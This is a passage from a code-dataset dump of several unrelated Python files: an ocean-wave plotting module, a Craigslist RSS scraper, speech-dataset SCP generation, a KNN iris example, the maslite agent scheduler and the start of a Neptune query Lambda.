position_subplots(ax_map, axs, scale=scale)\n\n return ax_map, axs\n\n \ndef position_subplots(ax_map, axs, scale=.1):\n '''Updates subplot positions in map\n\n Parameters\n ----------\n ax_map : AxesSubplot\n Map axes object\n axs : list of AxesSubplot\n List of subplots to be positioned. Each axes should have a\n property ``coords`` specifying the target position in data\n coordinates of the map axes.\n scale : float\n Size of subplots in axes coordinates\n\n '''\n\n fig = ax_map.get_figure()\n \n for i, ax in enumerate(axs):\n if not hasattr(ax, 'coords'):\n continue\n\n # get current subplot position in axes coordinates\n pos = ax.get_position()\n pos_scn = ax_map.transData.transform(ax.coords)\n pos_axs = ax_map.transAxes.inverted().transform(pos_scn)\n\n # get position of subplot corners in figure coordinates\n pos_crn = [(pos_axs[0] - scale/2.,\n pos_axs[1] - scale/2.),\n (pos_axs[0] + scale/2.,\n pos_axs[1] + scale/2.)]\n pos_scn = ax_map.transAxes.transform(pos_crn)\n pos_fig = fig.transFigure.inverted().transform(pos_scn)\n\n # update subplot position\n pos.x0 = pos_fig[0,0]\n pos.x1 = pos_fig[1,0]\n pos.y0 = pos_fig[0,1]\n pos.y1 = pos_fig[1,1]\n \n ax.set_position(pos)\n\n\nclass OceanWavesPlotMethods(_PlotMethods):\n\n '''Inheritence class to add map plotting functionality to xarray.DataArray objects'''\n \n def __init__(self, darray, x=None, y=None, **kwargs):\n '''Class initilisation\n\n Parameters\n ----------\n x : list\n Array with x-coordinates\n y : list\n Array with y-coordinates\n args, kwargs\n Arguments passed to super class\n\n '''\n\n if not HAS_MATPLOTLIB:\n raise ImportError('Matplotlib not available')\n \n self._x = x\n self._y = y\n super(OceanWavesPlotMethods, self).__init__(darray, **kwargs)\n\n\n def __call__(self, **kwargs):\n\n # if data is directional, faceted and not yet polar, make it polar\n if 'direction' in self._da.dims:\n if 'col' in kwargs.keys() or 'row' in kwargs.keys():\n if not 'subplot_kws' in kwargs.keys():\n kwargs.update(dict(subplot_kws = dict(projection = 'polar'),\n sharex = False,\n sharey = False))\n\n r = super(OceanWavesPlotMethods, self).__call__(**kwargs)\n\n self.find_axes(r)\n self.rotate_axes()\n \n return r\n\n\n @functools.wraps(spatial_map)\n def spatial_map(self, ax=None, **kwargs):\n '''Plot wave data on map'''\n if self._x is None or self._y is None:\n raise ValueError('Cannot plot map if locations are not defined')\n self._axes = spatial_map(self._da, self._x, self._y, ax=ax, **kwargs)[1]\n self.rotate_axes()\n return self._axes\n\n\n def find_axes(self, r):\n\n # find axes\n try:\n self._axes = r.axes.flatten()\n except:\n try:\n self._axes = r.axes\n except:\n self._axes = r\n\n try:\n iter(self._axes)\n except:\n self._axes = [self._axes]\n \n \n def rotate_axes(self):\n\n # rotate polars\n try:\n for ax in self._axes:\n if isinstance(ax, PolarAxes):\n ax.set_theta_zero_location('N')\n ax.set_theta_direction(-1)\n except:\n pass\n\n\n","sub_path":"oceanwaves/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":6795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"64538372","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 3 21:14:03 2018\n\n@author: JohnC\n\nPulls RSS information for our cities\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport sqlite3\nimport logging\nimport datetime\nimport time\nimport random\nfrom cl_car_functions import *\n\n#working_dir = \"c:\\\\Users\\\\JChan\\\\Dropbox\\\\Research\\\\car-buying\\\\\"\nworking_dir = \"c:\\\\Users\\\\Administrator\\\\Dropbox\\\\Research\\\\car-buying\\\\\"\ndb_name = \"Data\\\\car_data.db\"\n\nplaces = [\"atlanta\",\"minneapolis\",\"missoula\"]\nrss_url_start = \"https://\"\nrss_url_end = \".craigslist.org/search/cto\"\nparams = {'format':'rss',\n 'query':'subaru',\n 's':1}\nmax_pulls = 30 # max per city\n\nlogging.basicConfig(filename=\"\".join([working_dir,\"logs\\\\\",\"rss_pulls.log\"]), \n level=logging.INFO)\n\nlogging.info(\"Starting the RSS pull script: \" + str(datetime.datetime.now()))\n\n \nif not logging.getLogger().isEnabledFor(logging.DEBUG) :\n # Wait between 1 and 30 minutes to add some randomness.\n time.sleep(random.uniform(60,30*60))\n\nlogging.info(\"Done waiting to start: \" + str(datetime.datetime.now()))\n \nwith sqlite3.connect(working_dir + db_name) as con :\n cur = con.cursor()\n \n cur.execute(\"\"\"SELECT DISTINCT post_id\n FROM rss_pull\"\"\")\n \n current_post_ids = set([item[0] for item in cur.fetchall()])\n logging.debug(\"Total post_ids: \" + str(len(current_post_ids)))\n \n total_entries = 0\n for city in places :\n if not logging.getLogger().isEnabledFor(logging.DEBUG) :\n # Wait between 1 and 5 minutes to add some randomness.\n time.sleep(random.uniform(1*60,5*60))\n\n logging.info(\"Done waiting. Starting \" + city + \": \" + \n str(datetime.datetime.now()))\n\n city_entries = 0 # items for the city\n city_pulls = 0\n done_with_city = False\n params['s'] = 0\n \n while not done_with_city :\n rss_page = requests.get(\"\".join([rss_url_start,city,rss_url_end]),\n params=params)\n rss_soup = BeautifulSoup(rss_page.text,\"lxml\")\n \n city_pulls += 1\n pull_results = process_rss_page(rss_soup,cur,\n current_post_ids,\n city)\n \n city_entries += pull_results['items_uploaded']\n \n if (pull_results['total_items'] == 0 or\n city_pulls >= max_pulls) :\n done_with_city = True\n else :\n params['s'] += pull_results['total_items']\n \n total_entries += city_entries\n \n logging.info(\" \".join([\"Just pulled\",str(city_entries),\"values for\",city]))\n \n con.commit()\n logging.info(\" \".join([\"Total new URLs:\",str(total_entries)]))\n \nlogging.info(\"Finished RSS Pull: \" + str(datetime.datetime.now()) + \"\\n\\n\")\n","sub_path":"craigslist-scrape/pull_rss.py","file_name":"pull_rss.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"646539730","text":"import logging\nfrom glob import glob\n\nimport pdb\n\nclass Dataset():\n def __init__(self, path, mixPath = \"\", speakersPath = [], sample_rate = 8000):\n self.path = path\n self.mix = sorted(glob(path+mixPath+'/*.wav', recursive=False)) # ndarray of names of all samples\n self.speakers = [sorted(glob(path+speakerPath+'/*.wav', recursive=False)) for speakerPath in speakersPath] # ndarray of ndarrays of speakers sample names\n def __len__(self):\n return len(self.mix)\n def __getitem__(self, idx):\n return {\"mix\": self.mix[idx], \n \"speakers\": [speaker[idx] for speaker in self.speakers]}\n\ndef generate(path):\n print(\"Generating SCPs for path:\", path)\n fmix = open(path+\"mix.scp\", 'w')\n fs1 = open(path+\"spk1.scp\", 'w')\n fs2 = open(path+\"spk2.scp\", 'w')\n dataset = Dataset(path, \"mix\", [\"s1\",\"s2\"])\n for i in dataset:\n fmix.write(i[\"mix\"].split('/')[-1].strip('.wav')+\" \"+i[\"mix\"]+\"\\n\")\n fs1.write(i[\"speakers\"][0].split('/')[-1].strip('.wav')+\" \"+i[\"speakers\"][0]+\"\\n\")\n fs2.write(i[\"speakers\"][1].split('/')[-1].strip('.wav')+\" \"+i[\"speakers\"][1]+\"\\n\")\n fmix.close()\n fs1.close()\n fs2.close()\n\ndef generateFile(pathToFolder, pathToFile):\n print(\"Generating SCP\", pathToFile, \"for path:\", pathToFolder)\n fs = open(pathToFile, 'w')\n\n folder = sorted(glob(pathToFolder+'/*.wav', recursive=False)) # ndarray of names of all samples\n for i in folder:\n #print(i.split('/')[-1].strip('.wav')+\" \"+i+\"\\n\")\n fs.write(i.split('/')[-1].strip('.wav')+\" \"+i+\"\\n\")\n fs.close()\n print(\"Generated\")\n\n\nif __name__ == \"__main__\":\n #generate(\"../min_dataset/tr/\")\n #generate(\"../min_dataset/cv/\")\n #generate(\"../min_dataset/tt/\")\n generateFile(\"./out/1/spk1\", \"./out/1/spk1.scp\")\n generateFile(\"./out/1/spk2\", \"./out/1/spk2.scp\")","sub_path":"generate_scp.py","file_name":"generate_scp.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"481961766","text":"import numpy as np\nimport matplotlib.pyplot as plt\n#机器学习库,数据集\nfrom sklearn import neighbors, datasets\n\n# 导入鸢尾花数据,这里存储了其萼片和花瓣的长和宽,一共4个属性。\n#其中,鸢尾花又分为三类。\n# iris里有两个属性iris.data,iris.target\n# data里是一个矩阵,每一列代表了萼片或花瓣的长或宽,一共4列,每一行记录某个被测量的鸢尾植物,一共采样了150条记录\n#target是一个数组,存储了data中每条记录属于哪一类鸢尾植物,长度是150,因为共有3类鸢尾植物,所以数组元素的值为0,1,2。\niris = datasets.load_iris()\n\n#为了使数据看上去更加简单易懂,我们只取花萼的长和宽。\nX = iris.data[:, :2]\ny = iris.target\n\n#获得数据集中的最大值和最小值,并放大绝对值,用来设置坐标系,注意,y_min和y_max存储的是花萼的宽度,不是鸢尾花的种类\nx_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\ny_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n\n# 网格中的步长\nh = .02\n\n# meshgrid()创建坐标矩阵,需要为其传递两个一维数字数组\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h),np.arange(y_min, y_max, h))\n\n\n#实例点个数\nk = 15\n# 创建一个KNN分类器,需要设置k值和投票方式\nclf = neighbors.KNeighborsClassifier(n_neighbors=k, weights='uniform')\n#用训练数据拟合分类器\nclf.fit(X, y)\n\n\n# 设置坐标轴的取值范围\nplt.xlim(xx.min(), xx.max())\nplt.ylim(yy.min(), yy.max())\n\n# 设置坐标轴的标识\n#plt.xlabel(u'Sepal_Length')\n#plt.ylabel(u'Sepal_Width')\n\n#生成图片展示\nplt.show()\n","sub_path":"Code/untitled1/KNN_2.py","file_name":"KNN_2.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"463277553","text":"import time, datetime\nimport logging\nfrom copy import deepcopy\nfrom collections import deque\nfrom itertools import count\n\nCRITICAL = logging.CRITICAL\nFATAL = CRITICAL\nERROR = logging.ERROR\nWARNING = logging.WARNING\nWARN = WARNING\nINFO = logging.INFO\nDEBUG = logging.DEBUG\nNOTSET = logging.NOTSET\n\nLOG_LEVEL = logging.DEBUG\n\n\nclass MasLiteException(Exception):\n pass\n\n\nuuid_counter = count(1)\n\n\nclass AgentMessage(object):\n \"\"\"\n BaseMessage checks whether the sender and receiver are\n WorldBaseObjects and automatically retrieves their ids.\n If the receiver is None, the message is considered a broadcast\n where the mailman needs to figure out who is subscribing and\n how to get it to the subscribers.\n \"\"\"\n\n def __init__(self, sender, receiver=None, topic=None):\n \"\"\"\n :param sender: The agent (class Agent) or agent-uuid of the sender\n :param receiver: None (broadcast) or The agent (class Agent) or agent-uuid of the receiver\n :param topic: The topic; default is self.__class__.__name__ of the message subclass\n \"\"\"\n self._sender = None\n self.sender = sender # sender must be an agent, as a response otherwise can't be returned.\n self._receiver = None\n self.receiver = receiver # the uuid of the receiving agent.\n if topic is None:\n topic = self.__class__.__name__\n self._topic = topic # the keyword that the receiver should react upon.\n self._uuid = next(uuid_counter)\n\n def __str__(self):\n return \"From -> To : {} -> {} Topic: {}\".format(self.sender, self.receiver, self.topic)\n\n @property\n def sender(self):\n return self._sender\n\n @sender.setter\n def sender(self, sender):\n \"\"\"\n :param sender: the sender (FROM)\n :return:\n \"\"\"\n if isinstance(sender, Agent):\n self._sender = sender.uuid\n elif sender is None:\n self._sender = None\n else:\n self._sender = sender\n\n @property\n def receiver(self):\n return self._receiver\n\n @receiver.setter\n def receiver(self, receiver):\n \"\"\"\n :param receiver: the intended receiver of the message. Typically the sending\n agents uuid, retrievable as agent.get_uuid().\n if the receiver is None, the message is treated as a broadcast to all subscribers\n of the topic. If there are no subscribers of that topic, the mailman will drop\n the message.\n :return:\n \"\"\"\n if isinstance(receiver, Agent):\n self._receiver = receiver.uuid\n elif receiver is None:\n # If receiver is None, the message is treated as a\n # broadcast to all subscribers of the topic.\n # NB. If there are no subscribers of that topic, the mailman\n # will drop the message...\n self._receiver = None\n else:\n self._receiver = receiver\n\n def copy(self):\n \"\"\"\n :return: deep copy of the object.\n \"\"\"\n return deepcopy(self)\n\n @property\n def topic(self):\n \"\"\"\n :return: The topic of the message. Typically the saame as Message.__class__.__name__\n \"\"\"\n return self._topic\n\n @topic.setter\n def topic(self, topic):\n self._topic = topic\n\n @property\n def uuid(self):\n \"\"\"\n :return: returns the UUID of the message.\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, value):\n raise ValueError(\"UUID is permanent throughout the messages' lifetime and cannot be set after instantiation.\")\n\n\nclass Agent(object):\n \"\"\" The default agent class. \"\"\"\n uuid_counter = count(1)\n\n def __init__(self, uuid=None):\n \"\"\"\n :param uuid: None (default). Should only be set for inspection purposes.\n \"\"\"\n self.inbox = deque() # when using self.receive() we get the messages from here\n if uuid is None:\n self._uuid = next(Agent.uuid_counter) # this is our worldwide unique id.\n else:\n try:\n _ = hash(uuid)\n except TypeError:\n raise TypeError(\"uuid must be hashable.\")\n self._uuid = uuid\n self._scheduler_api = None\n self.operations = dict() # this is the link between msg.topic and agents response.\n self.keep_awake = False # this prevents the agent from entering sleep mode when there\n # are no new messages.\n\n @property\n def uuid(self):\n \"\"\"\n :return: Returns the UUID of the agent. This is guaranteed to be volatile and unique.\n No two runs of the same simulation will have agents with the same UUID.\n\n beginner errors:\n Q: Agent does not have attribute \"uuid\".\n A: You forgot to run super().__init__() on the Agent class.\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, value):\n raise ValueError(\"UUID cannot be set once the object has been instantiated\")\n\n def __str__(self):\n return \"<{}> uuid: {}\".format(self.__class__.__name__, self._uuid)\n\n def __repr__(self):\n return \"<{}> uuid: {}\".format(self.__class__.__name__, self._uuid)\n\n def send(self, msg):\n \"\"\" The only method for sending messages in the system.\n Message are deliberately NOT asserted for, as it should be possible\n to dispatch all kinds of objects.\n :param msg: any pickleable object.\n :return: None\n \"\"\"\n assert isinstance(msg, AgentMessage), \"sending messages that aren't based on AgentMessage's wont work\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.mail_queue.append(msg)\n\n @property\n def messages(self):\n \"\"\"\n :return: Boolean: True if there are messages.\n \"\"\"\n if len(self.inbox) > 0:\n return True\n else:\n return False\n\n def receive(self):\n \"\"\"\n :return: Returns AgentMessage if any.\n \"\"\"\n if self.messages:\n return self.inbox.popleft()\n else:\n return None\n\n def setup(self):\n \"\"\" Users can implement this setup method for starting up the kernel agent.\n\n NB! This method runs automatically when the agent is added to the scheduler !\n\n Cascades of setups are possible using the message AddNewAgent, such as for example:\n\n class Minion(Agent):\n def __init__(minion_id):\n ...\n\n\n for minion in range(minions):\n m = Minion(minion_id=minion)\n msg = AddNewAgent(sender=self, agent=m)\n self.send(msg)\n\n A good approach is to use have functions for each message and register the\n functions in the Agent's class' operations at setup:\n\n def setup(self):\n self.subscribe(self.uuid)\n\n self.operations.update({\"new request\": self.new_request,\n \"hello\": self.receive_hello_msg})\n\n for topic in self.operations:\n self.subscribe(topic)\n \"\"\"\n pass\n\n def teardown(self):\n \"\"\"Users can implement this teardown method for shutting down the kernel agent.\n\n ! Runs automatically when the agent is removed from the scheduler !\n\n \"\"\"\n pass\n\n def update(self):\n \"\"\" Users must implement the update method using:\n send(msg)\n receive(msg)\n examples of CnC signals are the classes `StartMessage` and `StopMessage`\n\n A good approach is to use:\n\n while self.messages:\n msg = self.receive()\n operation = self.operations.get(msg.topic)\n if operation is not None:\n operation(msg)\n else:\n self.logger(\"%s %s: don't know what to do with: %s\" %\n (self.__class__.__name__, str(self.uuid())[-6:], str(msg)),\n log_level=\"DEBUG\")\n\n if some messages take precedence over others (priority messages), the\n inbox should be emptied in the beginning of the update function for\n sorting. For example:\n\n priority_topics = [1,2,3]\n priority_messages = deque() # from collections import deque\n normal_messages = deque()\n while self.messages:\n msg = self.receive()\n if msg.topic in priority_topics:\n priority_messages.append(msg)\n else:\n normal_messages.append(msg)\n priority_messages.extend(normal_messages)\n while len(priority_messages) > 0:\n msg = priority_messages.popleft()\n \"\"\"\n raise NotImplementedError(\"derived classes must implement a update method\")\n\n def log(self, msg, level=NOTSET):\n \"\"\"\n :param msg: str or AgentMessage\n :param level: int\n :return:\n \"\"\"\n assert isinstance(self._scheduler_api, Scheduler)\n self._scheduler_api.log(level, msg)\n\n def set_alarm(self, alarm_time, alarm_message=None, relative=False, ignore_alarm_if_idle=True):\n \"\"\" to set alarms\n\n :param alarm_time: time as timestamp() (float)\n :param alarm_message: AgentMessage, if None the scheduler will run \"update\" on the agent once.\n :param relative: boolean (1 second later is relative)\n True: alarm goes off at time.time() + alarm_time\n False: alarm goes off at alarm_time (must be greater than time.time() )\n :param ignore_alarm_if_idle: boolean, if True, the scheduler will ignore that an alarm was set,\n if there are no more messages being exchanged.\n \"\"\"\n assert isinstance(alarm_time, (float, int)), \"expected float or int time. Use time.time() or datetime.datetime.now().timestamp()\"\n now = time.time()\n if relative:\n alarm_time = now + alarm_time\n\n if alarm_time < now:\n raise ValueError(\"Alarm time is in the past\")\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.set_alarm(uuid=self.uuid, alarm_time=alarm_time,\n alarm_message=alarm_message,\n ignore_alarm_if_idle=ignore_alarm_if_idle)\n\n def subscribe(self, topic):\n \"\"\"\n A method to be used by the agent to set and subscribe to a particular topic\n :param topic: string\n\n Examples:\n To subscribe to messages for the agent itself, use: topic=self.uuid\n\n To subscribe to messages for the agents own class (including class broadcasts),\n use: topic=self.__class__.__name__\n\n To subscribe to messages of a particular subject, use:\n topic=AgentMessage.__class__.__name__\n\n \"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.subscribe(uuid=self.uuid, topic=topic)\n\n def unsubscribe(self, topic=None):\n \"\"\" A method to be used by the agent to unset and unsubscribe to a particular topic\n :param topic: string or None. If None, the agent unsubscribes from everything.\n\n Note that all agents automatically unsubscribe at teardown.\n \"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.unsubscribe(uuid=self.uuid, topic=topic)\n\n def get_subscriber_list(self, topic):\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n return self._scheduler_api.get_subscriber_list(topic)\n\n def get_subscription_topics(self):\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n return self._scheduler_api.get_subscription_topics()\n\n def pause(self):\n \"\"\" Tells the scheduler to stop at the end of the update cycle. \"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.pause()\n\n def add(self, agent):\n \"\"\" Adds the agent to the scheduler. \"\"\"\n assert isinstance(agent, Agent)\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.add(agent)\n\n def remove(self, uuid):\n \"\"\" Removes the agent from the scheduler. \"\"\"\n assert isinstance(self._scheduler_api, Scheduler), \"agent must be added to scheduler using scheduler.add(agent)\"\n self._scheduler_api.remove(uuid)\n\n\nclass SchedulerException(MasLiteException):\n pass\n\n\nclass Alarm(object):\n \"\"\" Data structure for the Schedulers alarm\"\"\"\n __slots__ = ['uuid', 'alarm_time', 'alarm_message', 'ignore_alarm_if_idle']\n\n def __init__(self, uuid, alarm_time, alarm_message, ignore_alarm_if_idle):\n self.uuid = uuid\n self.alarm_time = alarm_time\n self.alarm_message = alarm_message\n self.ignore_alarm_if_idle = ignore_alarm_if_idle\n\n\nclass Scheduler(object):\n \"\"\" The scheduler that handles updates of all agents.\"\"\"\n\n def __init__(self, logger=None):\n \"\"\"\n :param logger: optional: logging.logger\n \"\"\"\n self.mail_queue = deque()\n self.mailing_lists = {}\n self.agents = dict()\n self.needs_update = set()\n self.has_keep_awake = set()\n self.alarms = []\n self._must_run_until_alarm_expires = False\n\n self._quit = False\n self._operating_frequency = 1000\n\n if logger is None:\n self._logger = logging.getLogger(self.__class__.__name__)\n self._logger.setLevel(LOG_LEVEL)\n self._logger.propagate = False\n if not any(isinstance(h, logging.StreamHandler) for h in self._logger.handlers):\n handler = logging.StreamHandler()\n handler.setLevel(LOG_LEVEL)\n self._logger.addHandler(handler)\n else:\n self._logger = logger\n\n def log(self, level, msg):\n self._logger.log(level, msg)\n\n def add(self, agent):\n \"\"\" Adds an agent to the scheduler\n :param agent: Agent\n \"\"\"\n assert isinstance(agent, Agent)\n self.log(level=DEBUG, msg=\"Registering agent {} {}\".format(agent.__class__.__name__, agent.uuid))\n if agent.uuid in self.agents:\n raise SchedulerException(\"Agent uuid already in usage.\")\n self.agents[agent.uuid] = agent\n agent._scheduler_api = self\n self.subscribe(agent.uuid, topic=agent.uuid)\n self.subscribe(agent.uuid, topic=agent.__class__.__name__)\n agent.setup()\n\n if agent.keep_awake:\n self.has_keep_awake.add(agent.uuid)\n self.needs_update.add(agent.uuid)\n\n def remove(self, agent_or_uuid):\n \"\"\" Removes an agent from the scheduler\n :param agent_or_uuid: Agent or uuid of the agent.\n \"\"\"\n if not isinstance(agent_or_uuid, Agent):\n agent = self.agents.get(agent_or_uuid, None)\n if agent is None:\n raise ValueError(\"Agent not found: {}\".format(agent_or_uuid))\n else:\n agent = agent_or_uuid\n assert isinstance(agent, Agent)\n\n if agent.uuid not in self.agents:\n self.log(level=DEBUG, msg=\"Agent exists but hasn't been added: {}\".format(agent_or_uuid))\n return\n\n self.log(level=DEBUG, msg=\"DeRegistering agent {}\".format(agent.uuid))\n agent.teardown()\n self.unsubscribe(agent.uuid)\n if agent.uuid in self.needs_update:\n self.needs_update.remove(agent.uuid)\n if agent.uuid in self.has_keep_awake:\n self.has_keep_awake.remove(agent.uuid)\n del self.agents[agent.uuid]\n\n def run(self, seconds=None, iterations=None, pause_if_idle=True, clear_alarms_at_end=True):\n \"\"\" The main 'run' operation of the Scheduler.\n\n :param seconds: float, int, None: optional number of real-time seconds to run.\n :param iterations: float, int, None: feature to let the scheduler run for\n N (`iterations`) updates before pausing.\n :param pause_if_idle: boolean: default=False: If no new messages are exchanged\n the scheduler's clock will tick along as any other real-time system.\n If pause_if_idle is set to True, the scheduler will pause once the message queue\n is idle.\n :param clear_alarms_at_end: boolean: deletes any alarms if paused.\n\n Depending on which of 'seconds' or 'iterations' occurs first, the simulation\n will be paused.\n \"\"\"\n start_time = None\n if isinstance(seconds, (int, float)) and seconds > 0:\n start_time = time.time()\n\n iterations_to_halt = None\n if isinstance(iterations, int) and iterations > 0:\n iterations_to_halt = abs(iterations)\n\n assert isinstance(pause_if_idle, bool)\n assert isinstance(clear_alarms_at_end, bool)\n\n # check all agents for messages (in case that someone on the outside has added messages).\n updated_agents = {agent.uuid for agent in self.agents.values() if agent.inbox or agent.keep_awake}\n self.needs_update.update(updated_agents)\n self.process_mail_queue()\n\n # The main loop of the scheduler:\n self._quit = False\n while not self._quit: # _quit is set by method self.pause() and can be called by any agent.\n\n # update the agents. process.\n self.needs_update.update(self.has_keep_awake)\n for uuid in self.needs_update:\n agent = self.agents[uuid]\n agent.update()\n if agent.keep_awake:\n self.has_keep_awake.add(agent.uuid)\n else:\n self.has_keep_awake.discard(agent.uuid)\n self.needs_update.clear()\n\n # check any timed alarms.\n self.check_alarms()\n\n # distribute messages or sleep.\n no_messages = len(self.mail_queue) == 0\n if self.mail_queue:\n self.process_mail_queue()\n\n # determine whether to stop:\n if start_time is not None:\n now = time.time()\n if now >= (start_time + seconds):\n self._quit = True\n\n if iterations_to_halt is not None:\n if iterations_to_halt > 0:\n iterations_to_halt -= 1\n if iterations_to_halt == 0:\n self._quit = True\n\n if no_messages:\n if self._must_run_until_alarm_expires is True:\n time.sleep(1 / self._operating_frequency)\n elif pause_if_idle:\n self._quit = True\n\n if clear_alarms_at_end:\n self.alarms.clear()\n\n def process_mail_queue(self):\n \"\"\"\n distributes the mail, so that when the scheduler pauses, new users\n can debug the agents starting with their fresh state with new messages.\n \"\"\"\n while self.mail_queue:\n msg = self.mail_queue.popleft()\n if isinstance(msg, AgentMessage):\n topic = msg.topic\n receiver = msg.receiver\n recipients = set()\n # 1. collect the list of recipients\n if receiver in self.mailing_lists:\n recipients.update(self.mailing_lists[receiver])\n if topic in self.mailing_lists: # then it's a tracked topic\n recipients.update((self.mailing_lists[topic]))\n # 2. distribute the mail.\n if len(recipients) > 0: # receiver is not in self.mailing_lists, so s/h/it might be moving.\n self.send_to_recipients(msg=msg, recipients=recipients)\n else:\n self.log(level=DEBUG, msg=\"{} is not registered on a mailing list.\".format(receiver))\n else:\n self.log(level=WARNING,\n msg=\"Discovered a non-AgentMessage in the inbox. The message is dumped.\")\n\n def send_to_recipients(self, msg, recipients):\n \"\"\" Distributes AgentMessages to all registered recipients.\n :param msg: an instance of AgentMessage\n :param recipients: The registered recipients\n \"\"\"\n for uuid in recipients: # this loop is necessary as a tracker may be on the reciever.\n agent = self.agents.get(uuid, None)\n if agent is None:\n continue\n self.needs_update.add(uuid)\n if len(recipients) == 1:\n agent.inbox.append(msg)\n else:\n agent.inbox.append(msg.copy()) # deepcopy is used to prevent that anyone modifies a shared object...\n\n def pause(self):\n self._quit = True\n\n def set_alarm(self, uuid, alarm_time, alarm_message, ignore_alarm_if_idle):\n now = time.time()\n assert alarm_time > now, \"Alarm time is in the past\"\n self.alarms.append(Alarm(uuid, alarm_time, alarm_message, ignore_alarm_if_idle))\n self.alarms.sort(key=lambda x: x.alarm_time)\n if ignore_alarm_if_idle is False:\n self._must_run_until_alarm_expires = True\n\n def check_alarms(self):\n now = time.time()\n expired_alarms = [a for a in self.alarms if now >= a.alarm_time]\n if not expired_alarms:\n return\n self.alarms = [a for a in self.alarms if now < a.alarm_time]\n self._must_run_until_alarm_expires = any((a for a in self.alarms if a.ignore_alarm_if_idle is False))\n for alarm in expired_alarms:\n assert isinstance(alarm, Alarm)\n agent = self.agents.get(alarm.uuid, None)\n if agent is None: # agent could have been removed.\n continue\n self.needs_update.add(alarm.uuid)\n if alarm.alarm_message is not None:\n agent.inbox.append(alarm.alarm_message)\n\n def subscribe(self, uuid, topic):\n \"\"\" subscribe lets the Agent react to SubscribeMessage and adds the subscriber.\n to registered subscribers. Used by default during `_setup` by all agents.\n :param uuid:\n :param topic:\n :return:\n\n Notes: The method adds agent to subscriber list.\n Any agent may subscribe for the same topic many times (this is managed)\n \"\"\"\n assert uuid in self.agents, \"uuid not in scheduler.\"\n if topic not in self.mailing_lists:\n self.mailing_lists[topic] = set()\n self.log(level=DEBUG, msg=\"%s requesting topics added: %s\" % (uuid, topic))\n if uuid not in self.mailing_lists[topic]:\n self.mailing_lists[topic].add(uuid)\n if topic == uuid:\n self.log(level=DEBUG, msg=\"%s subscribing to messages for itself.\" % (uuid))\n else:\n self.log(level=DEBUG, msg=\"%s subscribing to topic: %s\" % (uuid, topic))\n else:\n self.log(level=DEBUG, msg=\"%s already subscribing to topic: %s\" % (uuid, topic))\n\n def unsubscribe(self, uuid, topic=None):\n \"\"\" unsubscribes a subscriber from messages.\n :param uuid: agent uuid\n :param topic: str, if None, all topics are unsubscribed from.\n \"\"\"\n if topic is not None:\n self.mailing_lists[topic].remove(uuid)\n if len(self.mailing_lists[topic]) == 0:\n del self.mailing_lists[topic]\n return\n\n for topic in [t for t in self.mailing_lists.keys()]:\n self.mailing_lists[topic].discard(uuid)\n if len(self.mailing_lists[topic]) == 0:\n del self.mailing_lists[topic]\n\n def get_subscriber_list(self, topic):\n \"\"\" Returns the list of subscribers of a particular topic.\"\"\"\n if topic in self.mailing_lists:\n return self.mailing_lists.get(topic).copy()\n return []\n\n def get_subscription_topics(self):\n \"\"\" Returns the list of subscription topics\"\"\"\n return [t for t in self.mailing_lists.keys()]\n\n\n","sub_path":"maslite/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":24377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"418513042","text":"#!/usr/bin/env python3\n\"\"\"Run a query against the latest graph for a given name and optional version.\nRun as a lambda this calls Neptune.\nRun from the command line this finds the runquery lambda, sends a query to it and\nreads the results from S3.\n\"\"\"\nimport hashlib\nimport json\nimport sys\nimport time\n\nimport boto3\n\nfrom altimeter.core.awslambda import get_required_lambda_env_var, get_required_lambda_event_var\nfrom altimeter.core.neptune.client import AltimeterNeptuneClient, NeptuneEndpoint\n\n\ndef lambda_handler(event, context):\n graph_names_list = get_required_lambda_event_var(event, \"graph_names\")\n if not isinstance(graph_names_list, list):\n raise ValueError(f\"Value for graph_names should be a list. Is {type(graph_names_list)}\")\n graph_names = set(graph_names_list)\n query = get_required_lambda_event_var(event, \"query\")\n if not isinstance(query, str):\n raise ValueError(f\"Value for query should be a str. Is {type(query)}\")\n max_age_min = get_required_lambda_event_var(event, \"max_age_min\")\n if not isinstance(max_age_min, int):\n raise ValueError(f\"Value for max_age_min should be an int. Is {type(max_age_min)}\")\n\n host = get_required_lambda_env_var(\"NEPTUNE_HOST\")\n port = get_required_lambda_env_var(\"NEPTUNE_PORT\")\n region = get_required_lambda_env_var(\"NEPTUNE_REGION\")\n results_bucket = get_required_lambda_env_var(\"RESULTS_BUCKET\")\n\n endpoint = NeptuneEndpoint(host=host, port=port, region=region)\n client = AltimeterNeptuneClient(max_age_min=max_age_min, neptune_endpoint=endpoint)\n query_result = client.run_query(graph_names=graph_names, query=query)\n\n csv_results = 